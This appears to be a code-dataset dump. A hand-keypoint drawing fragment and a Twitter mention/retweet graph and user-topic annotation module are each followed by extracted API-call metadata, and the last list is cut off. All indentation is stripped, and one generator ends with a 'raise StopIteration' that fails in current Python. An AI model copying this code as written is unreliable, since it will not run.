max_val = 0
for i in range(0, 21):
for j in range(0, 32):
for k in range(0, 32):
if heatmap[0][j][k][i] > max_val:
max_val = heatmap[0][j][k][i]
max_j = j
max_k = k
pos_list.append(max_j)
pos_list.append(max_k)
joint_list.append(np.asarray(pos_list))
pos_list = []
max_j = 0
max_k = 0
max_val = 0
joint_list = np.asarray(joint_list)
joint_list = joint_list * 8
for i in range(0,21) :
joint_list[i][0] += bxmin
joint_list[i][1] += bymin
cv2.circle(frame, joint_list[i], radius=2, color=(255, 0, 255))
return frame,joint_list
| [
"numpy.asarray",
"cv2.circle",
"numpy.reshape",
"cv2.resize"
] | [((861, 924), 'cv2.resize', 'cv2.resize', (['crop_img', '(256, 256)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(crop_img, (256, 256), interpolation=cv2.INTER_CUBIC)\n', (871, 924), False, 'import cv2\n'), ((942, 983), 'numpy.reshape', 'np.reshape', (['final_frame', '(1, 256, 256, 3)'], {}), '(final_frame, (1, 256, 256, 3))\n', (952, 983), True, 'import numpy as np\n'), ((1570, 1592), 'numpy.asarray', 'np.asarray', (['joint_list'], {}), '(joint_list)\n', (1580, 1592), True, 'import numpy as np\n'), ((1728, 1791), 'cv2.circle', 'cv2.circle', (['frame', 'joint_list[i]'], {'radius': '(2)', 'color': '(255, 0, 255)'}), '(frame, joint_list[i], radius=2, color=(255, 0, 255))\n', (1738, 1791), False, 'import cv2\n'), ((1453, 1473), 'numpy.asarray', 'np.asarray', (['pos_list'], {}), '(pos_list)\n', (1463, 1473), True, 'import numpy as np\n')] |
__author__ = '<NAME> (<EMAIL>)'
import gc
import os
import json
from multiprocessing import Pool
from functools import partial
import numpy as np
import scipy.sparse as spsp
import networkx as nx
from reveal_user_annotation.common.config_package import get_threads_number
from reveal_user_annotation.common.datarw import store_pickle, load_pickle
from reveal_user_annotation.mongo.preprocess_data import extract_graphs_and_lemmas_from_tweets,\
extract_connected_components
from reveal_user_annotation.text.map_data import chunks
from reveal_user_annotation.text.clean_text import clean_single_word
from reveal_user_annotation.twitter.clean_twitter_list import user_twitter_list_bag_of_words
from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary
from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix
from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv,\
write_screen_name_to_topics
from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists
from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian,\
get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices
def submatrix_pull_via_networkx(matrix, node_array, directed=True):
if directed:
graph = nx.from_scipy_sparse_matrix(matrix, create_using=nx.DiGraph())
else:
graph = nx.from_scipy_sparse_matrix(matrix, create_using=nx.Graph())
sub_graph = graph.subgraph(list(node_array))
sub_matrix = nx.to_scipy_sparse_matrix(sub_graph, dtype=np.float64, format="csr")
return sub_matrix
def coo_submatrix_pull(matrix, row_array, col_array):
# Make sure we are dealing with a coordinate sparse format matrix.
if type(matrix) != spsp.coo_matrix:
raise TypeError("Matrix must be sparse COOrdinate format")
# Initialize mask index arrays.
gr = -1 * np.ones(matrix.shape[0])
gc = -1 * np.ones(matrix.shape[1])
submatrix_row_size = row_array.size
submatrix_col_size = col_array.size
ar = np.arange(0, submatrix_row_size)
ac = np.arange(0, submatrix_col_size)
gr[row_array[ar]] = ar
gc[col_array[ac]] = ac
mrow = matrix.row
mcol = matrix.col
newelem = (gr[mrow] > -1) & (gc[mcol] > -1)
newrows = mrow[newelem]
newcols = mcol[newelem]
submatrix = spsp.coo_matrix((matrix.data[newelem], np.array([gr[newrows], gc[newcols]])),
shape=(submatrix_row_size, submatrix_col_size))
return submatrix
def make_directory_tree(graph_dataset_folder):
full_graph_folder = graph_dataset_folder + "/full_graph"
weakly_connected_graph_folder = graph_dataset_folder + "/weakly_connected_graph"
weakly_connected_label_folder = graph_dataset_folder + "/weakly_connected_graph/labels"
implicit_graph_folder = weakly_connected_graph_folder + "/implicit_graph"
simple_undirected_graph_folder = implicit_graph_folder + "/simple_undirected_implicit_graph"
combinatorial_implicit_graph_folder = implicit_graph_folder + "/combinatorial_implicit_graph"
directed_implicit_graph_folder = implicit_graph_folder + "/directed_implicit_graph"
make_sure_path_exists(full_graph_folder)
make_sure_path_exists(weakly_connected_graph_folder)
make_sure_path_exists(weakly_connected_label_folder)
make_sure_path_exists(implicit_graph_folder)
make_sure_path_exists(simple_undirected_graph_folder)
make_sure_path_exists(combinatorial_implicit_graph_folder)
make_sure_path_exists(directed_implicit_graph_folder)
return full_graph_folder, weakly_connected_graph_folder, weakly_connected_label_folder, implicit_graph_folder,\
simple_undirected_graph_folder, combinatorial_implicit_graph_folder, directed_implicit_graph_folder
def process_tweet_collection(tweet_generator, full_graph_folder):
mention_graph,\
retweet_graph,\
user_lemma_matrix,\
tweet_id_set,\
user_id_set,\
node_to_id,\
lemma_to_attribute,\
id_to_name = extract_graphs_and_lemmas_from_tweets(tweet_generator)
# Store full graph data in corresponding folder.
store_pickle(full_graph_folder + "/mention_graph" + ".pkl", mention_graph)
scipy_sparse_to_csv(full_graph_folder + "/mention_graph" + ".tsv", mention_graph, "\t", directed=True)
store_pickle(full_graph_folder + "/retweet_graph" + ".pkl", retweet_graph)
scipy_sparse_to_csv(full_graph_folder + "/retweet_graph" + ".tsv", retweet_graph, "\t", directed=True)
store_pickle(full_graph_folder + "/user_lemma_matrix" + ".pkl", user_lemma_matrix)
scipy_sparse_to_csv(full_graph_folder + "/user_lemma_matrix" + ".tsv", user_lemma_matrix, "\t", directed=True)
store_pickle(full_graph_folder + "/tweet_id_set" + ".pkl", tweet_id_set)
store_pickle(full_graph_folder + "/user_id_set" + ".pkl", user_id_set)
store_pickle(full_graph_folder + "/node_to_id" + ".pkl", node_to_id)
store_pickle(full_graph_folder + "/lemma_to_attribute" + ".pkl", lemma_to_attribute)
store_pickle(full_graph_folder + "/id_to_name" + ".pkl", id_to_name)
def weakly_connected_graph(full_graph_folder, weakly_connected_graph_folder):
# Read relevant data.
mention_graph = load_pickle(full_graph_folder + "/mention_graph" + ".pkl")
mention_graph = spsp.coo_matrix(spsp.csr_matrix(mention_graph))
retweet_graph = load_pickle(full_graph_folder + "/retweet_graph" + ".pkl")
retweet_graph = spsp.coo_matrix(spsp.csr_matrix(retweet_graph))
user_lemma_matrix = load_pickle(full_graph_folder + "/user_lemma_matrix" + ".pkl")
user_lemma_matrix = spsp.coo_matrix(spsp.csr_matrix(user_lemma_matrix))
user_id_set = load_pickle(full_graph_folder + "/user_id_set" + ".pkl")
node_to_id = load_pickle(full_graph_folder + "/node_to_id" + ".pkl")
# Extract weakly connected graph for the mention graph.
weakly_connected_men_ret_graph, weakly_connected_node_to_id, old_node_list = extract_connected_components(spsp.coo_matrix(spsp.csr_matrix(mention_graph + retweet_graph)),
"weak",
node_to_id)
# Calculate the user twitter id set for the weakly connected component.
weakly_connected_user_id_set = set(list(weakly_connected_node_to_id.values()))
node_array = np.array(old_node_list, dtype=np.int64)
# Extract corresponding retweet graph and user lemma matrix.
weakly_connected_mention_graph = submatrix_pull_via_networkx(spsp.coo_matrix(mention_graph),
node_array,
directed=True)
weakly_connected_retweet_graph = submatrix_pull_via_networkx(spsp.coo_matrix(retweet_graph),
node_array,
directed=True)
user_lemma_matrix = spsp.csr_matrix(user_lemma_matrix)
weakly_connected_user_lemma_matrix = user_lemma_matrix[node_array, :]
# Change sparse matrices to coordinate format in order to save as an edge list.
weakly_connected_mention_graph = spsp.coo_matrix(weakly_connected_mention_graph)
weakly_connected_retweet_graph = spsp.coo_matrix(weakly_connected_retweet_graph)
weakly_connected_user_lemma_matrix = spsp.coo_matrix(weakly_connected_user_lemma_matrix)
# Store weakly connected data.
scipy_sparse_to_csv(weakly_connected_graph_folder + "/mention_graph.tsv",
weakly_connected_mention_graph,
separator="\t",
directed=True)
scipy_sparse_to_csv(weakly_connected_graph_folder + "/retweet_graph.tsv",
weakly_connected_retweet_graph,
separator="\t",
directed=True)
scipy_sparse_to_csv(weakly_connected_graph_folder + "/user_lemma_matrix.tsv",
weakly_connected_user_lemma_matrix,
separator="\t",
directed=True)
store_pickle(weakly_connected_graph_folder + "/user_id_set" + ".pkl", weakly_connected_user_id_set)
store_pickle(weakly_connected_graph_folder + "/node_to_id" + ".pkl", weakly_connected_node_to_id)
def make_implicit_graphs(weakly_connected_graph_folder,
simple_undirected_graph_folder,
combinatorial_implicit_graph_folder,
directed_implicit_graph_folder):
# Read relevant data.
mention_graph = read_adjacency_matrix(weakly_connected_graph_folder + "/mention_graph.tsv", separator="\t")
retweet_graph = read_adjacency_matrix(weakly_connected_graph_folder + "/retweet_graph.tsv", separator="\t")
# user_lemma_matrix = read_adjacency_matrix(weakly_connected_graph_folder + "/user_lemma_matrix.tsv", separator="\t")
# Make text-based graph.
# lemma_graph = make_text_graph(user_lemma_matrix)
####################################################################################################################
# Make simple undirected graphs.
####################################################################################################################
simple_undirected_mention_graph = (mention_graph + mention_graph.transpose())/2
simple_undirected_mention_graph = spsp.coo_matrix(spsp.csr_matrix(simple_undirected_mention_graph))
scipy_sparse_to_csv(simple_undirected_graph_folder + "/mention_graph" + ".tsv",
simple_undirected_mention_graph,
separator="\t",
directed=False)
gc.collect()
print("Simple Undirected Mention Graph.")
simple_undirected_retweet_graph = (retweet_graph + retweet_graph.transpose())/2
simple_undirected_retweet_graph = spsp.coo_matrix(spsp.csr_matrix(simple_undirected_retweet_graph))
scipy_sparse_to_csv(simple_undirected_graph_folder + "/retweet_graph" + ".tsv",
simple_undirected_retweet_graph,
separator="\t",
directed=False)
gc.collect()
print("Simple Undirected Retweet Graph.")
# simple_undirected_lemma_graph = (lemma_graph + lemma_graph.transpose())/2
# simple_undirected_lemma_graph = spsp.coo_matrix(spsp.csr_matrix(simple_undirected_lemma_graph))
# scipy_sparse_to_csv(simple_undirected_graph_folder + "/lemma_graph" + ".tsv",
# simple_undirected_lemma_graph,
# separator="\t",
# directed=False)
# gc.collect()
# print("Simple Undirected Lemma Graph.")
simple_undirected_mr_graph = (simple_undirected_mention_graph + simple_undirected_retweet_graph)/2
simple_undirected_mr_graph = spsp.coo_matrix(spsp.csr_matrix(simple_undirected_mr_graph))
scipy_sparse_to_csv(simple_undirected_graph_folder + "/men_ret_graph" + ".tsv",
simple_undirected_mr_graph,
separator="\t",
directed=False)
gc.collect()
print("Simple Undirected Mention+Retweet Graph.")
####################################################################################################################
# Make combinatorial implicit graphs.
####################################################################################################################
implicit_combinatorial_mention_graph, phi = get_adjacency_matrix_via_combinatorial_laplacian(mention_graph, 0.1)
implicit_combinatorial_mention_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_combinatorial_mention_graph))
scipy_sparse_to_csv(combinatorial_implicit_graph_folder + "/mention_graph" + ".tsv",
implicit_combinatorial_mention_graph,
separator="\t",
directed=False)
gc.collect()
print("Implicit Combinatorial Mention Graph.")
print(implicit_combinatorial_mention_graph.sum(axis=1))
implicit_combinatorial_retweet_graph, phi = get_adjacency_matrix_via_combinatorial_laplacian(retweet_graph, 0.1)
implicit_combinatorial_retweet_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_combinatorial_retweet_graph))
scipy_sparse_to_csv(combinatorial_implicit_graph_folder + "/retweet_graph" + ".tsv",
implicit_combinatorial_retweet_graph,
separator="\t",
directed=False)
gc.collect()
print("Implicit Combinatorial Retweet Graph.")
print(implicit_combinatorial_retweet_graph.sum(axis=1))
# implicit_combinatorial_lemma_graph, phi = get_adjacency_matrix_via_combinatorial_laplacian(lemma_graph, 0.5)
# implicit_combinatorial_lemma_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_combinatorial_lemma_graph))
# scipy_sparse_to_csv(combinatorial_implicit_graph_folder + "/lemma_graph" + ".tsv",
# implicit_combinatorial_lemma_graph,
# separator="\t",
# directed=False)
# gc.collect()
# print("Implicit Combinatorial Lemma Graph.")
####################################################################################################################
# Make and store directed implicit graphs.
####################################################################################################################
implicit_directed_mention_graph, phi = get_adjacency_matrix_via_directed_laplacian(mention_graph, 0.1)
implicit_directed_mention_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_directed_mention_graph))
scipy_sparse_to_csv(directed_implicit_graph_folder + "/mention_graph" + ".tsv",
implicit_directed_mention_graph,
separator="\t",
directed=False)
gc.collect()
print("Implicit Directed Mention Graph.")
print(implicit_directed_mention_graph.sum(axis=1))
implicit_directed_retweet_graph, phi = get_adjacency_matrix_via_directed_laplacian(retweet_graph, 0.1)
implicit_directed_retweet_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_directed_retweet_graph))
scipy_sparse_to_csv(directed_implicit_graph_folder + "/retweet_graph" + ".tsv",
implicit_directed_retweet_graph,
separator="\t",
directed=False)
gc.collect()
print("Implicit Directed Retweet Graph.")
print(implicit_directed_retweet_graph.sum(axis=1))
# implicit_directed_lemma_graph, phi = get_adjacency_matrix_via_directed_laplacian(lemma_graph, 0.1)
# implicit_directed_lemma_graph = spsp.coo_matrix(spsp.csr_matrix(implicit_directed_lemma_graph))
# scipy_sparse_to_csv(directed_implicit_graph_folder + "/lemma_graph" + ".tsv",
# implicit_directed_lemma_graph,
# separator="\t",
# directed=False)
# gc.collect()
# print("Implicit Directed Lemma Graph.")
####################################################################################################################
# Make multiview transition matrices.
####################################################################################################################
men_ret_transition_matrix = get_multiview_transition_matrix([mention_graph,
retweet_graph],
weights=None,
method="zhou")
implicit_combinatorial_men_ret_graph, com_phi,\
implicit_directed_men_ret_graph, dir_phi = get_implicit_adjacency_matrices(men_ret_transition_matrix,
rho=0.1)
scipy_sparse_to_csv(combinatorial_implicit_graph_folder + "/men_ret_graph" + ".tsv",
implicit_combinatorial_men_ret_graph,
separator="\t",
directed=False)
scipy_sparse_to_csv(directed_implicit_graph_folder + "/men_ret_graph" + ".tsv",
implicit_directed_men_ret_graph,
separator="\t",
directed=False)
gc.collect()
print("Implicit Mention-Retweet Graphs.")
# men_lem_transition_matrix = get_multiview_transition_matrix([mention_graph,
# lemma_graph],
# weights=None,
# method="zhou")
# implicit_combinatorial_men_lem_graph, com_phi,\
# implicit_directed_men_lem_graph, dir_phi = get_implicit_adjacency_matrices(men_lem_transition_matrix,
# rho=0.2)
# gc.collect()
# print("Implicit Mention-Lemma Graphs.")
#
# men_ret_lem_transition_matrix = get_multiview_transition_matrix([mention_graph,
# retweet_graph,
# lemma_graph],
# weights=None,
# method="zhou")
# implicit_combinatorial_men_ret_lem_graph, com_phi,\
# implicit_directed_men_ret_lem_graph, dir_phi = get_implicit_adjacency_matrices(men_ret_lem_transition_matrix,
# rho=0.2)
# gc.collect()
# print("Implicit Mention-Retweet-Lemma Graphs.")
def make_annotation(twitter_lists_folder, twitter_lists_keywords_folder, weakly_connected_graph_folder, weakly_connected_label_folder, full_graph_folder):
# TODO: Move keywords from Mongo to the folder.
# Read set of users.
weakly_connected_user_id_set = load_pickle(weakly_connected_graph_folder + "/user_id_set" + ".pkl")
weakly_connected_node_to_id = load_pickle(weakly_connected_graph_folder + "/node_to_id" + ".pkl")
id_to_name = load_pickle(full_graph_folder + "/id_to_name" + ".pkl")
# Read set of twitter lists.
twitter_list_file_list = os.listdir(twitter_lists_folder)
twitter_list_file_list = [int(file_name[:-4]) for file_name in twitter_list_file_list]
# Read which users are annotated.
user_keywords_file_list = os.listdir(twitter_lists_keywords_folder)
user_keywords_file_list = [int(file_name[:-5]) for file_name in user_keywords_file_list]
# Find which twitter lists need to be preprocessed.
user_twitter_id_list = [file_name for file_name in twitter_list_file_list if file_name in weakly_connected_user_id_set]
user_twitter_id_list = [file_name for file_name in user_twitter_id_list if file_name not in user_keywords_file_list]
twitter_list_file_list = [str(file_name) + ".pkl" for file_name in user_twitter_id_list]
pool = Pool(processes=get_threads_number()*2,)
user_chunks = chunks(twitter_list_file_list, get_threads_number()*2)
pool.map(partial(worker_function,
lemmatizing="wordnet",
source_folder=twitter_lists_folder,
target_folder=twitter_lists_keywords_folder),
user_chunks)
# # Make user-label matrix.
user_keywords_file_list = [str(file_name) for file_name in user_keywords_file_list]
user_twitter_list_keywords_gen = read_local_user_annotations(twitter_lists_keywords_folder,
user_keywords_file_list)
weakly_connected_id_to_node = dict(zip(weakly_connected_node_to_id.values(),
weakly_connected_node_to_id.keys()))
# # twitter_id_to_weakly_connected_node = {int(twitter_id): weakly_connected_id_to_node[int(twitter_id)] for twitter_id in user_keywords_file_list if int(twitter_id) in weakly_connected_id_to_node.keys()}
# node_twitter_list_keywords_gen = ((weakly_connected_id_to_node[int(user_twitter_id)], twitter_list_keywords) for user_twitter_id, twitter_list_keywords in user_twitter_list_keywords_gen if int(user_twitter_id) in weakly_connected_id_to_node.keys())
# for node, j in user_twitter_list_keywords_gen:
# print(node, j)
implicated_user_twitter_list_keywords_gen = ((int(user_twitter_id), twitter_list_keywords) for user_twitter_id, twitter_list_keywords in user_twitter_list_keywords_gen if int(user_twitter_id) in weakly_connected_id_to_node.keys())
# for node, j in user_twitter_list_keywords_gen:
# print(node, j)
####################################################################################################################
# Semi-automatic user annotation.
####################################################################################################################
reveal_set = get_reveal_set()
topic_keyword_dict = get_topic_keyword_dictionary()
available_topics = set(list(topic_keyword_dict.keys()))
keyword_list = list()
for topic in reveal_set:
if topic in available_topics:
keyword_list.extend(topic_keyword_dict[topic])
lemma_set = list()
for keyword in keyword_list:
lemma = clean_single_word(keyword, lemmatizing="wordnet")
lemma_set.append(lemma)
lemma_set = set(lemma_set)
keyword_topic_dict = dict()
for topic, keyword_set in topic_keyword_dict.items():
for keyword in keyword_set:
keyword_topic_dict[keyword] = topic
user_label_matrix, annotated_nodes, label_to_lemma, node_to_lemma_tokeywordbag = form_user_term_matrix(implicated_user_twitter_list_keywords_gen,
weakly_connected_id_to_node,
lemma_set=lemma_set,
keyword_to_topic_manual=keyword_topic_dict)
scipy_sparse_to_csv(weakly_connected_label_folder + "/unfiltered_user_label_matrix" + ".tsv",
user_label_matrix,
"\t",
directed=True)
store_pickle(weakly_connected_label_folder + "/unfiltered_annotated_nodes" + ".pkl",
annotated_nodes)
store_pickle(weakly_connected_label_folder + "/unfiltered_label_to_lemma" + ".pkl",
label_to_lemma)
store_pickle(weakly_connected_label_folder + "/unfiltered_node_to_lemma_tokeywordbag" + ".pkl",
node_to_lemma_tokeywordbag)
user_label_matrix, annotated_user_ids, label_to_lemma = filter_user_term_matrix(user_label_matrix,
annotated_nodes,
label_to_lemma,
max_number_of_labels=None)
lemma_to_keyword = form_lemma_tokeyword_map(annotated_nodes, node_to_lemma_tokeywordbag)
# user_label_matrix, annotated_user_ids, label_to_lemma, lemma_to_keyword = semi_automatic_user_annotation(implicated_user_twitter_list_keywords_gen, weakly_connected_id_to_node)
# Store user-label binary matrix.
scipy_sparse_to_csv(weakly_connected_label_folder + "/user_label_matrix" + ".tsv",
user_label_matrix,
"\t",
directed=True)
# Store user-label keyword matrix.
write_screen_name_to_topics(weakly_connected_label_folder + "/user_name_to_topics" + ".tsv",
user_label_matrix,
weakly_connected_node_to_id,
id_to_name,
label_to_lemma,
lemma_to_keyword,
separator="\t")
return twitter_lists_folder
def worker_function(file_name_list,
lemmatizing,
source_folder,
target_folder):
source_path_list = (source_folder + "/" + file_name for file_name in file_name_list)
target_path_list = (target_folder + "/" + file_name[:-4] + ".json" for file_name in file_name_list)
# Get the lists of a user
for source_path in source_path_list:
twitter_lists_corpus = load_pickle(source_path)
if "lists" in twitter_lists_corpus.keys():
twitter_lists_corpus = twitter_lists_corpus["lists"]
else:
continue
bag_of_lemmas, lemma_to_keywordbag = user_twitter_list_bag_of_words(twitter_lists_corpus, lemmatizing)
user_annotation = dict()
user_annotation["bag_of_lemmas"] = bag_of_lemmas
user_annotation["lemma_to_keywordbag"] = lemma_to_keywordbag
target_path = next(target_path_list)
with open(target_path, "w", encoding="utf-8") as fp:
json.dump(user_annotation, fp)
def read_local_user_annotations(json_folder,
user_twitter_ids):
if json_folder is not None:
for user_twitter_id in user_twitter_ids:
path = json_folder + "/" + str(user_twitter_id) + ".json"
with open(path, "r", encoding="utf-8") as f:
twitter_lists = json.load(f)
yield user_twitter_id, twitter_lists
else:
raise StopIteration
| [
"networkx.to_scipy_sparse_matrix",
"reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv",
"numpy.ones",
"gc.collect",
"numpy.arange",
"reveal_graph_embedding.datautil.snow_datautil.read_adjacency_matrix",
"reveal_user_annotation.twitter.manage_resources.get_reveal_set",
"reveal_user_anno... | [((1702, 1770), 'networkx.to_scipy_sparse_matrix', 'nx.to_scipy_sparse_matrix', (['sub_graph'], {'dtype': 'np.float64', 'format': '"""csr"""'}), "(sub_graph, dtype=np.float64, format='csr')\n", (1727, 1770), True, 'import networkx as nx\n'), ((2233, 2265), 'numpy.arange', 'np.arange', (['(0)', 'submatrix_row_size'], {}), '(0, submatrix_row_size)\n', (2242, 2265), True, 'import numpy as np\n'), ((2275, 2307), 'numpy.arange', 'np.arange', (['(0)', 'submatrix_col_size'], {}), '(0, submatrix_col_size)\n', (2284, 2307), True, 'import numpy as np\n'), ((3361, 3401), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['full_graph_folder'], {}), '(full_graph_folder)\n', (3382, 3401), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3406, 3458), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['weakly_connected_graph_folder'], {}), '(weakly_connected_graph_folder)\n', (3427, 3458), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3463, 3515), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['weakly_connected_label_folder'], {}), '(weakly_connected_label_folder)\n', (3484, 3515), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3520, 3564), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['implicit_graph_folder'], {}), '(implicit_graph_folder)\n', (3541, 3564), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3569, 3622), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['simple_undirected_graph_folder'], {}), '(simple_undirected_graph_folder)\n', (3590, 3622), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3627, 3685), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['combinatorial_implicit_graph_folder'], {}), '(combinatorial_implicit_graph_folder)\n', (3648, 3685), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((3690, 3743), 'reveal_user_classification.datautil.make_directory_tree.make_sure_path_exists', 'make_sure_path_exists', (['directed_implicit_graph_folder'], {}), '(directed_implicit_graph_folder)\n', (3711, 3743), False, 'from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists\n'), ((4200, 4254), 'reveal_user_annotation.mongo.preprocess_data.extract_graphs_and_lemmas_from_tweets', 'extract_graphs_and_lemmas_from_tweets', (['tweet_generator'], {}), '(tweet_generator)\n', (4237, 4254), False, 'from reveal_user_annotation.mongo.preprocess_data import extract_graphs_and_lemmas_from_tweets, extract_connected_components\n'), ((4313, 4387), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/mention_graph' + '.pkl')", 'mention_graph'], {}), "(full_graph_folder + '/mention_graph' + '.pkl', mention_graph)\n", (4325, 4387), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4392, 4498), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/mention_graph' + '.tsv')", 'mention_graph', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/mention_graph' + '.tsv',\n mention_graph, '\\t', directed=True)\n", (4411, 4498), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4499, 4573), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/retweet_graph' + '.pkl')", 'retweet_graph'], {}), "(full_graph_folder + '/retweet_graph' + '.pkl', retweet_graph)\n", (4511, 4573), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4578, 4684), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/retweet_graph' + '.tsv')", 'retweet_graph', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/retweet_graph' + '.tsv',\n retweet_graph, '\\t', directed=True)\n", (4597, 4684), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4685, 4771), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/user_lemma_matrix' + '.pkl')", 'user_lemma_matrix'], {}), "(full_graph_folder + '/user_lemma_matrix' + '.pkl',\n user_lemma_matrix)\n", (4697, 4771), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4772, 4886), 'reveal_graph_embedding.datautil.snow_datautil.scipy_sparse_to_csv', 'scipy_sparse_to_csv', (["(full_graph_folder + '/user_lemma_matrix' + '.tsv')", 'user_lemma_matrix', '"""\t"""'], {'directed': '(True)'}), "(full_graph_folder + '/user_lemma_matrix' + '.tsv',\n user_lemma_matrix, '\\t', directed=True)\n", (4791, 4886), False, 'from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv, write_screen_name_to_topics\n'), ((4887, 4959), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/tweet_id_set' + '.pkl')", 'tweet_id_set'], {}), "(full_graph_folder + '/tweet_id_set' + '.pkl', tweet_id_set)\n", (4899, 4959), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((4964, 5034), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/user_id_set' + '.pkl')", 'user_id_set'], {}), "(full_graph_folder + '/user_id_set' + '.pkl', user_id_set)\n", (4976, 5034), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5039, 5107), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/node_to_id' + '.pkl')", 'node_to_id'], {}), "(full_graph_folder + '/node_to_id' + '.pkl', node_to_id)\n", (5051, 5107), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5112, 5200), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/lemma_to_attribute' + '.pkl')", 'lemma_to_attribute'], {}), "(full_graph_folder + '/lemma_to_attribute' + '.pkl',\n lemma_to_attribute)\n", (5124, 5200), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5201, 5269), 'reveal_user_annotation.common.datarw.store_pickle', 'store_pickle', (["(full_graph_folder + '/id_to_name' + '.pkl')", 'id_to_name'], {}), "(full_graph_folder + '/id_to_name' + '.pkl', id_to_name)\n", (5213, 5269), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5396, 5454), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/mention_graph' + '.pkl')"], {}), "(full_graph_folder + '/mention_graph' + '.pkl')\n", (5407, 5454), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5543, 5601), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/retweet_graph' + '.pkl')"], {}), "(full_graph_folder + '/retweet_graph' + '.pkl')\n", (5554, 5601), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5694, 5756), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/user_lemma_matrix' + '.pkl')"], {}), "(full_graph_folder + '/user_lemma_matrix' + '.pkl')\n", (5705, 5756), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5851, 5907), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/user_id_set' + '.pkl')"], {}), "(full_graph_folder + '/user_id_set' + '.pkl')\n", (5862, 5907), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((5925, 5980), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (["(full_graph_folder + '/node_to_id' + '.pkl')"], {}), "(full_graph_folder + '/node_to_id' + '.pkl')\n", (5936, 5980), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((6635, 6674), 'numpy.array', 'np.array', (['old_node_list'], {'dtype': 'np.int64'}), '(old_node_list, dtype=np.int64)\n', (6643, 6674), True, 'import numpy as np\n'), ((7275, 7309), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['user_lemma_matrix'], {}), '(user_lemma_matrix)\n', (7290, 7309), True, 'import scipy.sparse as spsp\n'), ((7506, 7553), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_mention_graph'], {}), '(weakly_connected_mention_graph)\n', (7521, 7553), True, 'import scipy.sparse as spsp\n'), ((7591, 7638), 'scipy.sparse.coo_matrix', 'spsp.coo_matrix', (['weakly_connected_retweet_graph'], {}), '(weakly_connected_retweet_graph)\n', (7606, 7638), True, 'import scipy.sparse as spsp\n'), ((7680, 7731), 